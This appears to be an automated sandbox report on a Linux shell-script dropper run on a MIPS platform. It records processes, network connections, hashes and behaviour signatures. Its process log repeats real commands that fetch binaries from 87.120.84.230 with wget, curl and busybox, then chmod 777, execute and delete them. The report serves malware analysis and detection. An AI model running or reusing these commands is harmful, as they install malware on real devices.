[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/852-1-0xb674f000-0xb6760044-memory.dmp

memory/858-2-0xb6759000-0xb676a044-memory.dmp

memory/882-3-0xb670d000-0xb671e044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 02:06

Reported

2024-10-28 02:08

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

154s

Command Line

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A

Processes

/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh

[/tmp/0e50b03feb061f9e04117e63128d3cb941c873102a9471b2f0af8ea3cdc8de24.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

[wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://87.120.84.230/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

